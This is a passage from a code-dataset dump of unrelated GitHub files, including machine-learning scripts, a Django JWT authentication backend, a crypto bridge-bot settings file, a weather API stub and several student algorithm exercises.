{destination}\\n\")\n\n print(\"Generating confusion matrix figure...\")\n display = ConfusionMatrixDisplay(confusion_matrix=cm, display_labels=[1, 0])\n display.plot()\n plt.show()\n destination = os.path.join(\n performance_data_directory, filename_pretty + ' Confusion Matrix.png'\n )\n display.figure_.savefig(destination)\n print(f\"Figure saved to {destination}\\n\")\n\n print(\"All classifier training operations complete.\")\n\n\ndef parameter_search(features: np.ndarray,\n targets: np.ndarray,\n filename: str):\n \"\"\"\n Runs a parameter search on the basic multi-layer perceptron algorithm and\n prints and stores the results\n :param features:\n :param targets:\n :return:\n \"\"\"\n X_train, X_test, y_train, y_test = \\\n train_test_split(features, targets, test_size=20_000)\n clf = MLPClassifier(max_iter=2000, verbose=1)\n\n # Utility function to report best scores\n def report(results, n_top=None):\n if n_top == None:\n n_top = len(results)\n for i in range(1, n_top + 1):\n candidates = np.flatnonzero(results['rank_test_score'] == i)\n for candidate in candidates:\n print(\"Model with rank: {0}\".format(i))\n print(\"Mean validation score: {0:.3f} (std: {1:.3f})\"\n .format(results['mean_test_score'][candidate],\n results['std_test_score'][candidate]))\n print(\"Parameters: {0}\".format(results['params'][candidate]))\n print(\"\")\n\n param_grid = {\n 'hidden_layer_sizes': [(100,),\n (100, 100),\n (100, 100, 100),\n (200, 200, 200)],\n 'learning_rate': ['constant', 'invscaling', 'adaptive'],\n 'solver': ['sgd', 'adam']\n }\n grid_search = GridSearchCV(clf, param_grid=param_grid, verbose=1)\n start = time()\n grid_search.fit(X_train, y_train)\n print(\"GridSearchCV took %.2f seconds for %d candidate parameter settings.\"\n % (time() - start, len(grid_search.cv_results_['params'])))\n report(grid_search.cv_results_)\n\n results = pd.DataFrame(grid_search.cv_results_)\n destination = os.path.join(\n parameter_data_directory, filename\n )\n with open(destination, 'wb') as file:\n pickle.dump(results, file)\n print(\"All classifier training operations complete.\")\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"AttackPenguin/395_SAMSHA_Project","sub_path":"classification_algorithms/basic_multilayer_perceptron/ca_basic_multilayer_perceptron.py","file_name":"ca_basic_multilayer_perceptron.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31041964440","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n ret = ListNode(0)\n cur = ret\n carry = 0\n\n while l1 or l2 or carry:\n val = carry\n if l1:\n val += l1.val\n l1 = l1.next\n if l2:\n val += l2.val\n l2 = l2.next\n carry = val / 10\n val = val % 10\n # carry, val = divmod(val, 10)\n cur.next = ListNode(val)\n cur = cur.next\n\n return ret.next\n","repo_name":"ypliu/leetcode-python","sub_path":"src/002_add_two_numbers/002_add_two_numbers.py","file_name":"002_add_two_numbers.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12722378490","text":"import numpy as np\r\nimport os\r\nimport pandas as pd\r\nimport re\r\nimport requests\r\nimport seaborn as sns\r\nfrom bs4 import BeautifulSoup\r\nfrom keras.models import load_model, Sequential\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.layers import Dense, LSTM\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\r\nfrom urllib import parse\r\n\r\n\r\ndef download_data_set():\r\n \"\"\"\r\n Download the Beijing PM2.5 data set and saves it in the program folder\r\n \"\"\"\r\n # The page used to extract the PM2.5 data set\r\n url = \"https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data\"\r\n # Request the main data set HTML page\r\n main_page = requests.get(url)\r\n # Verify if the request was successful\r\n if main_page.status_code != 200:\r\n raise requests.HTTPError(f\"The request returned the HTTP error code {main_page.status_code} - \"\r\n f\"{main_page.reason}.\")\r\n # Parse the HTML response using beautifulsoup library\r\n main_page_parsed = BeautifulSoup(main_page.text, \"html.parser\")\r\n # Retrieve the data set download url (
<a> tag) that contains the text Data Folder\r\n    try:\r\n        download_url = main_page_parsed.find(\"a\", string=\"Data Folder\")[\"href\"]\r\n    except TypeError:\r\n        raise Exception(\"Site HTML changed.\")\r\n    # Join the main url with the download url\r\n    download_url = parse.urljoin(url, download_url)\r\n    # Request the data set download HTML page\r\n    download_page = requests.get(download_url)\r\n    # Parse the HTML response using beautifulsoup library\r\n    download_page_parsed = BeautifulSoup(download_page.text, \"html.parser\")\r\n    # Retrieve the data set file name\r\n    # more data sets could be downloaded using a regular expression that searches for \".csv\"\r\n    try:\r\n        file_name = download_page_parsed.find(\"a\", string=re.compile(\"PRSA.+.csv\"))[\"href\"]\r\n    except TypeError:\r\n        raise Exception(\"Site HTML changed.\")\r\n    # Join download url with the file name\r\n    download_link = parse.urljoin(download_url, file_name)\r\n    # Request the data set csv HTML page\r\n    data_set_page = requests.get(download_link)\r\n    # Save the page content as a csv\r\n    with open(file_name, 'w') as csv_file:\r\n        csv_file.write(data_set_page.text.replace('\r\n', '\n'))\r\n\r\n\r\ndef main():\r\n    # region READ_DATA\r\n\r\n    # Verify if the data set is already downloaded\r\n    if not os.path.exists(\"PRSA_data_2010.1.1-2014.12.31.csv\"):\r\n        download_data_set()\r\n\r\n    # Read the data set csv as a DataFrame using pandas\r\n    df = pd.read_csv(\"PRSA_data_2010.1.1-2014.12.31.csv\")\r\n\r\n    # endregion READ_DATA\r\n\r\n    # region EXPLORATORY_ANALYSIS\r\n\r\n    # Describe the dataset\r\n    print(df.describe())\r\n\r\n    # Format the timestamp fields\r\n    df['date'] = pd.to_datetime(df[['year', 'month', 'day', 'hour']])\r\n\r\n    # Set the DataFrame index\r\n    df.set_index('date', inplace=True)\r\n\r\n    # Remove the Row Number because it's only an identifier and the timestamp\r\n    df.drop(columns=['No', 'year', 'month', 'day', 'hour'], inplace=True)\r\n\r\n    # The first 24 instances got an error in the reading (NaN for the PM2.5)\r\n    # Since removing them will not highly affect the other instances it will be disregarded\r\n    df = df[24:]\r\n\r\n    # To maintain the correct order for each reading, when NaN is found it is replaced with the mean\r\n    df['pm2.5'].fillna(df['pm2.5'].mean(), inplace=True)\r\n\r\n    # Perform a uni-variate analysis\r\n    # For each column\r\n    for column in df.columns:\r\n        # If it is the polynomic variable\r\n        if column == \"cbwd\":\r\n            # Plot a bar graph\r\n            plt.figure()\r\n            sns.countplot(x=df[column], order=df[column].value_counts().index)\r\n            plt.show()\r\n        else:\r\n            # Plot the histogram\r\n            plt.figure()\r\n            sns.histplot(x=df[column], kde=True)\r\n            plt.show()\r\n\r\n            # Perform the box plot\r\n            plt.figure()\r\n            sns.boxplot(x=df[column])\r\n            plt.show()\r\n\r\n    # Perform a bi-variate analysis\r\n    # Correlation\r\n    plt.figure()\r\n    corr = df.corr()\r\n    sns.heatmap(corr, xticklabels=corr.columns.values, yticklabels=corr.columns.values, annot=True)\r\n    plt.show()\r\n\r\n    # Pair plot\r\n    sns.pairplot(df.fillna(0), diag_kind='kde')\r\n    plt.show()\r\n\r\n    # endregion EXPLORATORY_ANALYSIS\r\n\r\n    # region REGRESSION\r\n\r\n    # Encode the cbwd column to be numeric\r\n    le = LabelEncoder().fit(df['cbwd'])\r\n    df['cbwd'] = le.transform(df['cbwd'])\r\n\r\n    # Scale all values using the min max scaler\r\n    min_max_scaler = MinMaxScaler()\r\n    scaled_data = min_max_scaler.fit_transform(df.values)\r\n\r\n    # Split into the input and output\r\n    x = scaled_data[0:-1, :]\r\n    y = scaled_data[1:, 0]\r\n\r\n    # Split the data in train and test\r\n    
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.4, shuffle=False)\r\n\r\n # Reshape\r\n x_train = x_train.reshape(x_train.shape[0], 1, x_train.shape[1])\r\n x_test = x_test.reshape(x_test.shape[0], 1, x_test.shape[1])\r\n\r\n # Try to load the model, in case of an error, create, train, and save the model\r\n try:\r\n model = load_model('regression_model')\r\n except (OSError, IOError, ImportError):\r\n # Create the LSTM model\r\n model = Sequential()\r\n model.add(LSTM(50, input_shape=(x_train.shape[1], x_train.shape[2]), dropout=0.2))\r\n model.add(Dense(1))\r\n model.compile(loss='mae', optimizer='adam')\r\n\r\n # Train the model\r\n early_stop = EarlyStopping(patience=10)\r\n error_history = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=100, verbose=2,\r\n callbacks=[early_stop], shuffle=False)\r\n\r\n # Plot the training error\r\n plt.plot(error_history.history['loss'], label='train')\r\n plt.plot(error_history.history['val_loss'], label='test')\r\n plt.legend()\r\n plt.show()\r\n\r\n model.save(\"regression_model\")\r\n\r\n # Use the trained model to predict\r\n predictions = model.predict(x_test)\r\n\r\n # Reshape the true input to its original shape\r\n x_test_re = x_test.reshape(x_test.shape[0], x_test.shape[2])\r\n\r\n # Concatenate the predictions with the input\r\n predictions = np.concatenate((predictions, x_test_re[:, 1:]), axis=1)\r\n\r\n # Scale the predictions to the original range\r\n predictions = min_max_scaler.inverse_transform(predictions)\r\n\r\n # Reshape the true output\r\n y_test = y_test.reshape(y_test.shape[0], 1)\r\n\r\n # Concatenate the true output with the input\r\n y_test = np.concatenate((y_test, x_test_re[:, 1:]), axis=1)\r\n\r\n # Scale the true output to the original range\r\n y_test = min_max_scaler.inverse_transform(y_test)\r\n\r\n # Print the root of the mean squared error\r\n print(np.sqrt(mean_squared_error(y_test[:, 0], predictions[:, 0])))\r\n\r\n # endregion REGRESSION\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"reylle/myVolvoPracticalTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20159370495","text":"import jwt\nfrom django.conf import settings\nfrom rest_framework import authentication, exceptions\n# jwt exceptions\nfrom jwt import exceptions as jwtexceptions\nfrom .models import User\n\n\nclass JWTAuthentication(authentication.BaseAuthentication):\n authentication_header_prefix = 'Bearer'\n\n def authenticate(self, request):\n \"\"\"\n 1) `None` - We return `None` if we do not wish to authenticate. Usually\n this means we know authentication will fail.\n\n 2) `(user, token)` - We return a user/token combination when\n authentication is successful.\n\n If neither case is met - raise the `AuthenticationFailed`\n \"\"\"\n request.user = None\n\n # `auth_header` should be an array with two elements: 1) the name of\n # the authentication header (in this case, \"Token\") and 2) the JWT\n # that we should authenticate against.\n auth_header = authentication.get_authorization_header(request).split()\n auth_header_prefix = self.authentication_header_prefix.lower()\n\n if not auth_header:\n return None\n\n if len(auth_header) == 1:\n # Invalid token header. No credentials provided. Do not attempt to\n # authenticate.\n return None\n\n elif len(auth_header) > 2:\n # Invalid token header. 
The Token string should not contain spaces.\n # Do not attempt to authenticate.\n return None\n\n # get an error if we didn't decode these values.\n prefix = auth_header[0].decode('utf-8')\n token = auth_header[1].decode('utf-8')\n\n if prefix.lower() != auth_header_prefix:\n # The auth header prefix is not what we expected. Do not attempt to authenticate.\n return None\n\n # Pass credentials authentication to the method below.\n return self._authenticate_credentials(request, token)\n\n def _authenticate_credentials(self, request, token):\n \"\"\"\n Try to authenticate the given credentials. If authentication is\n successful, return the user and token. If not, throw an error.\n \"\"\"\n try:\n payload = jwt.decode(token, settings.SECRET_KEY, algorithms=['HS256'])\n except exceptions.AuthenticationFailed:\n msg = 'Authentication Failed. Could not decode token.'\n raise exceptions.AuthenticationFailed(msg)\n except jwtexceptions.InvalidSignatureError:\n msg = 'Invalid signature'\n raise jwtexceptions.InvalidSignatureError(msg)\n except jwtexceptions.DecodeError as e:\n msg = 'JWT token decode error'\n raise jwtexceptions.DecodeError(msg, e)\n try:\n user = User.objects.get(pk=payload['id'])\n except User.DoesNotExist:\n msg = 'No user matching this token was found.'\n raise exceptions.AuthenticationFailed(msg)\n\n if not user.is_active:\n msg = 'This user has been deactivated.'\n raise exceptions.AuthenticationFailed(msg)\n\n return user, token\n","repo_name":"injirez/likeapprestapi","sub_path":"authentication/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17141462187","text":"import json\nimport os\nimport random\nimport sys\nimport copy\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom tensorflow.python.ops.numpy_ops import np_config\n\nfrom envs.citation import Citation\nfrom tasks import TrackAttitudeLong, TrackAttitude\nfrom tasks.tracking_attitude_lat import TrackAttitudeLat\nfrom tools import set_plot_styles\nfrom agents import SAC, IDHPSAC_DC\nfrom tools import create_dir, plot_weights_idhp, plot_incremental_model\nfrom tools.plotting import plot_weights_and_model\nfrom tools.utils import create_dir_time, d2r, nMAE, set_random_seed\n\n# Config\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nos.environ[\"TF_CPP_MIN_VLOG_LEVEL\"] = \"3\"\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\nnp_config.enable_numpy_behavior()\nset_plot_styles()\n\n\ndef main():\n # Evaluate trained agent\n evaluate(\"trained/IDHPSAC_DC_citation_tracking_attitude_1659358080\")\n\n input()\n\n\ndef evaluate(save_dir):\n \"\"\"\n Evaluate\n \"\"\"\n\n # Config\n config_agent_f = open(os.path.join(save_dir, \"config.json\"), \"r\")\n config_env_f = open(os.path.join(save_dir, \"config_env.json\"), \"r\")\n config_task_f = open(os.path.join(save_dir, \"config_task.json\"), \"r\")\n config_agent = json.load(config_agent_f)\n config_env = json.load(config_env_f)\n config_task = json.load(config_task_f)\n\n # Randomize\n seed = config_agent[\"seed\"]\n config_env[\"seed\"] = seed\n set_random_seed(seed)\n\n # Task\n task = TrackAttitude(config_task, evaluate_hard=True)\n\n # Environment\n config_env[\"failure\"] = \"ht_reduce\"\n config_env[\"failure_time\"] = 30\n env = Citation(config_env, dt=0.01)\n env_sac = Citation(config_env, dt=0.01)\n\n # Load agent\n config_agent[\"actor\"][\"lr_high\"] = 0.02\n config_agent[\"critic\"][\"lr_high\"] = 0.1\n agent_sac = 
SAC.load(\"trained/SAC_citation_tracking_attitude_1659223622/496000\", task, env_sac)\n agent: IDHPSAC_DC = IDHPSAC_DC.load(save_dir, task, env, agent_sac, config=config_agent)\n\n # Evaluate\n agent.learn()\n\n # Evaluate SAC-only\n agent_sac.evaluate()\n\n # Metrics\n nmae = nMAE(agent, env)\n nmae_sac = nMAE(agent_sac, env_sac)\n print(f\"nMAE Hybrid: {nmae * 100 :.2f}%\")\n print(f\"nMAE SAC: {nmae_sac * 100 :.2f}%\")\n\n # Plot response\n env.render(task, env_sac=env_sac)\n\n # Plot weights\n plot_weights_and_model(agent.agent_lon, agent.task_lon)\n plot_weights_and_model(agent.agent_lat, agent.task_lat)\n\n\ndef evaluate_lon(save_dir):\n \"\"\"\n Evaluate\n \"\"\"\n\n # Config\n config_agent_f = open(os.path.join(save_dir, \"config.json\"), \"r\")\n config_env_f = open(os.path.join(save_dir, \"config_env.json\"), \"r\")\n config_task_f = open(os.path.join(save_dir, \"config_task.json\"), \"r\")\n config_agent = json.load(config_agent_f)\n config_env = json.load(config_env_f)\n config_task = json.load(config_task_f)\n\n # Randomize\n seed = config_agent[\"seed\"]\n config_env[\"seed\"] = seed\n set_random_seed(seed)\n\n # Task\n # config_task[\"\"] =\n task = TrackAttitudeLong(config_task, evaluate=True)\n\n # Environment\n # config_env[\"failure\"] = \"de_reduce\"\n # config_env[\"failure_time\"] = 10\n env = Citation(config_env, dt=0.01)\n\n # Load agent\n config_agent[\"actor\"][\"lr_high\"] = 10\n config_agent[\"critic\"][\"lr_high\"] = 2\n agent_sac = SAC.load_npz(\"trained/SAC_citation_tracking_attitude_GT0PLE\", task, env) # TODO in save\n agent: IDHPSAC_DC = IDHPSAC_DC.load(save_dir, task, env, agent_sac, lon_only=True, config=config_agent)\n\n # Evaluate\n agent.learn()\n\n # Metrics\n nmae = nMAE(agent, env)\n print(f\"nMAE: {nmae * 100 :.2f}%\")\n\n # Plot response\n env.render(task, show_rmse=False, lr_warmup=config_agent[\"lr_warmup\"])\n\n # Plot weights\n plot_weights_and_model(agent.agent_lon, agent.task_lon)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CasperTeirlinck/RLFC-SACIDHP","sub_path":"scripts/evaluate_idhpsac_inner_dc.py","file_name":"evaluate_idhpsac_inner_dc.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"42405667692","text":"import inline as inline\nimport matplotlib\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport seaborn as sns # data visualization library\nimport matplotlib.pyplot as plt\nfrom minisom import MiniSom\nimport math\n\n# import warnings library\nimport warnings\n\n# ignore all warnings\nfrom som_implementationV2 import MySom\n\nwarnings.filterwarnings('ignore')\n\n############## Data Content ###################\n# ID number\n# Diagnosis (M = malignant, B = benign)\n# radius (mean of distances from center to points on the perimeter)\n# texture (standard deviation of gray-scale values)\n# perimeter\n# area\n# smoothness (local variation in radius lengths)\n# compactness (perimeter^2 / area - 1.0)\n# concavity (severity of concave portions of the contour)\n# concave points (number of concave portions of the contour)\n# symmetry\n# fractal dimension (\"coastline approximation\" - 1)\n# The mean, standard error and \"worst\" or largest (mean of the three largest values) of these features were computed for each image, resulting in 30 features. 
For instance, field 3 is Mean Radius, field 13 is Radius SE, field 23 is Worst Radius.\n# All feature values are recoded with four significant digits.\n# Missing attribute values: none\n# Class distribution: 357 benign, 212 malignant\n\n#print(np.sqrt(np.square(np.array([4, 5, 6]) - np.array([1, 2, 3]))).sum(axis=0))\n\n### Read and Analyse Data\nsamples = pd.read_csv('./breast_cancer_data.csv') # returns data frame\n\n# Before making anything like feature selection, feature extraction and classification, firstly we start with basic data analysis. Let's look at features of data.\n#print(samples.head()) # head method shows only first 5 rows\n\n# feature names as a list\ncol = samples.columns # .columns gives column names in data\n#print(col)\n\n# Remember:\n# 1) There is an id that cannot be used for classification\n# 2) Diagnosis is our class label\n\ny = samples.diagnosis\n\nB, M = y.value_counts()\n#print('Number of Benign: ', B)\n#print('Number of Malignant : ', M)\n\nlist = ['id', 'diagnosis']\nx = samples.drop(list, axis=1)\n\n#print(x)\n\n### transform to numpy matrix\ndata = x.to_numpy()\n\n### compute size of map\nsize = int(math.sqrt(int(5 * math.sqrt(data.shape[0]))))\n\n###compute number of features\nnumber_features = data.shape[1]\n\n#print(size)\n#print(number_features)\n#print(data)\n\nprint(data.shape)\nsom = MySom(size, size, number_features, sigma=2.0, learning_rate=0.5)\nsom.pca_init(data)\nsom.train(data, 1000)\n\n\nprint(size)\n\nplt.figure(figsize=(size, size))\nplt.pcolor(som.distance_map().T)\n\n#print(som.distance_map().T)\n\n\ntarget = samples['diagnosis'].values\n#print target\n\nt = np.zeros(len(target), dtype=int)\n\nt[target == 'M'] = 0\nt[target == 'B'] = 1\n\nprint(t)\n\n#print(t)\n\nlabels = samples['diagnosis']\nc = labels.astype('category')\nlabels = c.cat.codes\n\n\nmarkers = ['o', 's']\ncolors = ['r', 'g']\nfor cnt, xx in enumerate(data):\n    w = som.find_BMU(xx)\n    plt.plot(w[0] + .5, w[1] + .5, markers[labels[cnt]], markersize=12, markerfacecolor=colors[labels[cnt]],\n             markeredgecolor='k')\n\nplt.colorbar()\nplt.title('MySom')\n\nplt.show()\n\n\n\n","repo_name":"moisaoana/symbolic_analysis","sub_path":"Som_Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"42405667692","text":"\r\n\r\n# ===================================== options ===================================== #\r\n\r\n#----main-options----#\r\ncount_modules = 8 # number of modules to run out of modules, i.e. if modules holds 5 modules, a random 2 of the 5 will run\r\nshuffle = True # True / False. set True to shuffle the wallets\r\n\r\ndecimal_places = 7 # number of decimal places used when generating random numbers\r\nvalue_eth = [0.00001, 0.00006] # minimum and maximum amount of ETH for swaps and liquidity\r\n\r\ndelay_wallets = [10, 20] # minimum and maximum delay between wallets\r\ndelay_transactions = [10, 15] # minimum and maximum delay between transactions\r\nwaiting_gas = 30 # maximum gas value at which the script will keep working\r\nRETRY_COUNT = 2 # number of retries when errors occur\r\n\r\n#------bot-options------#\r\nbot_status = False # True / False\r\nbot_token = '' # telegram bot token\r\nbot_id = 0 # telegram id\r\n\r\n#----modules-options----#\r\n\r\nsupply_scrollswap = True # True / False, if False only the swap will run\r\n\r\nsupply_skydrome = True # True / False, if False only the swap will run\r\n\r\nsupply_spaceswap = True # True / False, if False only the swap will run\r\n\r\npercent_for_lending = 0.8 # percentage of the balance for LayerBank lending\r\nwithdraw_layerbank = True # True / False, if False only the supply will run\r\ncollateral_layerbank = True # True / False, required for withdrawal\r\n\r\npercent_for_wrap = 0.8 # percentage of the balance for wrap eth\r\n\r\norbiter_bridge = False # True / False\r\ndozapravka_orbiter = [True, 0.0005] # True / False, runs if the balance is below this number\r\nfrom_chain = 'Optimism' # Optimism | zkSync | Scrolll\r\nto_chain = 'Scrolll' # Optimism | zkSync | Scrolll\r\nvalue_for_bridge = [0.0063, 0.0075] # minimum and maximum amount of ETH for bridging via Orbiter\r\n\r\n# =================================== end-options =================================== #\r\n\r\n\r\n","repo_name":"WhereIsMyMindDL/Scroll","sub_path":"Scroll/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"38185762473","text":"import argparse\nimport logging\nimport asyncio\nfrom commandment.dep.dep import DEP\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"consumer_key\", help=\"The decrypted consumer_key from the DEP stoken\")\nparser.add_argument(\"consumer_secret\", help=\"The decrypted consumer_secret from the DEP stoken\")\nparser.add_argument(\"access_token\", help=\"The decrypted access_token from the DEP stoken\")\nparser.add_argument(\"access_secret\", help=\"The decrypted access_secret from the DEP stoken\")\nparser.add_argument(\"--url\", help=\"The URL of the DEP Service\", default=\"https://mdmenrollment.apple.com\")\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger('asyncio').setLevel(logging.WARNING)\n\nasync def initial_dep_fetch(dep: DEP):\n    \"\"\"Perform the initial DEP fetch, if required.\"\"\"\n    for page in dep.devices():\n        for device in page:\n            pass\n\nasync def dep_sync(consumer_key: str, consumer_secret: str, access_token: str, access_secret: str, url: str):\n    dep = DEP(consumer_key, consumer_secret, access_token, access_secret, url)\n    initial_fetch = await initial_dep_fetch(dep)\n\n\ndef main():\n    args = parser.parse_args()\n    logging.basicConfig(level=logging.DEBUG)\n    loop = asyncio.get_event_loop()\n\n    loop.run_until_complete(dep_sync(\n        args.consumer_key,\n        args.consumer_secret,\n        args.access_token,\n        args.access_secret,\n        args.url,\n    ))\n\n    try:\n        loop.run_forever()\n    finally:\n        loop.run_until_complete(loop.shutdown_asyncgens())\n        loop.close()\n    \n\nif __name__ == \"__main__\":\n    
main()\n","repo_name":"cmdmnt/commandment","sub_path":"commandment/dep/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":277,"dataset":"github-code","pt":"77"} +{"seq_id":"29395810989","text":"#La función debe retornar la distancia como un string\n# +1 : si la distancia es mayor que 1\n# IB : si la distancia es 1, y para llegar de una palabra a la otra hay que\n# insertar o borrar una letra\n# 1S : si la distancia es 1 porque hay que sustituir una letra\n# 0D : si las palabras son iguales\n\ndef levenshtein(palabra1,palabra2):\n largo1=len(palabra1)\n largo2=len(palabra2)\n lista1=list(palabra1)\n lista2=list(palabra2)\n i=0\n \n if largo1==largo2:\n if palabra1==palabra2:\n return \"0D\"\n else:\n for n in lista1:\n if not n in lista2:\n i+=1\n if i==1:\n return \"1S\"\n else:\n return \"+1\"\n \n if largo1!=largo2:\n if largo1>largo2:\n i=largo1-largo2\n else:\n i=largo2-largo1\n for n in lista1:\n if not n in lista2:\n i+=1\n if i==1:\n return \"IB\"\n else:\n return \"+1\"\n\nif __name__==\"__main__\":\n palabra1=input()\n palabra2=input()\n resultado=levenshtein(palabra1,palabra2)\n print(resultado)\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_bebf44c245edaa88ca4379a771ed4571.py","file_name":"tema10_ej2_bebf44c245edaa88ca4379a771ed4571.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27093824654","text":"from typing import List\nimport pandas as pd \nfrom surprise import SVD\nfrom surprise import Dataset\nfrom surprise import get_dataset_dir\nfrom surprise import Reader\n\n\nclass VoteEngine():\n\n def __init__(self, ):\n self.df = pd.read_csv(\"./models/track_votes.csv\")\n\n def get_recommendations(self, track_ids: List[str]):\n \"\"\"\n Get recommendations for a list of tracks\n \"\"\"\n\n df = self.df.sample(frac=0.05)\n \n votes = []\n for track_id in track_ids:\n votes.append([\"USER\", track_id, 5])\n \n df = df.append(votes)\n\n reader = Reader(rating_scale=(1, 5))\n data = Dataset.load_from_df(df[[\"uId\", \"tId\", \"rating\"]], reader)\n trainset = data.build_full_trainset()\n\n algo = SVD()\n algo.fit(trainset)\n\n \n recommendations = []\n\n for track in set(df[\"tId\"]):\n if track not in track_ids:\n pred = algo.predict(track, \"USER\").est\n\n if pred > 4:\n recommendations.append(( track, pred))\n\n # sort by second element of tuple\n recommendations = sorted(recommendations, key=lambda x: x[1], reverse=True)\n\n return [rec[0] for rec in recommendations[:10]]\n\n ","repo_name":"JorgeRuizDev/SpotMyFM","sub_path":"Ludwig/mir-backend/inference_engine/VoteEngine.py","file_name":"VoteEngine.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"16775076070","text":"from pprint import pprint\n\ndef solution(T):\n for l, layer in enumerate(T):\n if l == 0: continue\n for i in range(len(layer)):\n if i == 0:\n T[l][i] = T[l][i] + T[l - 1][i]\n elif i == len(layer) - 1:\n T[l][i] = T[l][i] + T[l - 1][i - 1]\n else:\n c1 = T[l][i] + T[l - 1][i]\n c2 = T[l][i] + T[l - 1][i - 1]\n T[l][i] = max(c1, c2)\n return max(T[-1])\n\n\nprint(solution([[7],\n [3, 8],\n [8, 1, 0],\n [2, 7, 4, 4],\n [4, 5, 2, 6, 5]])) # 
30\n","repo_name":"choiasher/problem-solving","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36563151848","text":"import fasttext\nimport html\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nblock_size = 256\n\nwith open('articolo.txt') as f:\n data = f.read().replace('\\n', '')\n\nmodel = fasttext.load_model('model_oroscopo.bin')\n\nscore = np.zeros(len(data))\nmax_divider = round(len(data) / block_size)\nprint(f\"Block size: {block_size}, data size: {len(data)}, pieces: {max_divider}\")\nfor divider in range(1, max_divider + 1):\n step = round(len(data) / divider)\n for start in range(0, len(data), step):\n end = start + step if start + step < len(data) else len(data)\n label, precision = model.predict(data[start:end])\n if 'oroscopo' in label[0]:\n score[start:end] += 1\n\nhtml_text = ''\nreturner = 150\nfor start in range(0, len(data), block_size):\n end = start + block_size if start + block_size < len(data) else len(data)\n a = sum(score[start:end]) / block_size / max_divider\n text = data[start:end]\n html_text += f'{html.escape(text)}'\nwith open('html.html', 'w') as f:\n f.write(html_text)\n","repo_name":"Ax6/NeuroFox","sub_path":"text-classifier/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20734266536","text":"from fastapi import FastAPI, HTTPException\n\n\nclass Day:\n def __init__(self, id, town, date, morning, daytime, night, humidity):\n self.id = id\n self.town = town\n self.date = date\n self.morning = morning\n self.daytime = daytime\n self.night = night\n self.humidity = humidity\n\n\ndays_list = [Day(0, \"Moscow\", \"01.01.2023\", \"-2\", \"1\", \"0\", \"80%\"),\n Day(1, \"Moscow\", \"29.12.2022\", \"-6\", \"-4\", \"-3\", \"65%\"),\n Day(2, \"Taganrog\", \"01.01.2023\", \"-8\", \"-10\", \"-7\", \"50%\")]\n\napp = FastAPI()\n\n\n@app.get(\"/v1/weather/{town}\")\nasync def weather(town):\n result = []\n for day in days_list:\n if day.town == town:\n result.append(day)\n return result\n\n\n@app.get(\"/v1/weather/{town}/{date}\")\nasync def weather(town, date):\n for day in days_list:\n if day.town == town and day.date == date:\n return day\n raise HTTPException(status_code=404, detail=\"Error\")\n","repo_name":"Parenek67/pain9","sub_path":"weather_service/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45595025905","text":"## 실험용으로 친구 코드를 제출합니다\n\nfrom itertools import combinations\nfrom collections import deque\n\n# 입력 받기\nN, M = map(int, input().split())\narray_original = [list(map(int, input().split())) for _ in range(N)]\n\n# 벽만 남긴 2차원 리스트 초기화\narray_only_wall = [[0]*N for _ in range(N)]\n\n# bfs 탐색을 위한 리스트\ndr, dc = [1,-1,0,0], [0,0,1,-1]\n\n# 바이러스 위치를 담을 리스트\nvirus_pos = []\n\n# 벽을 제외한 영역의 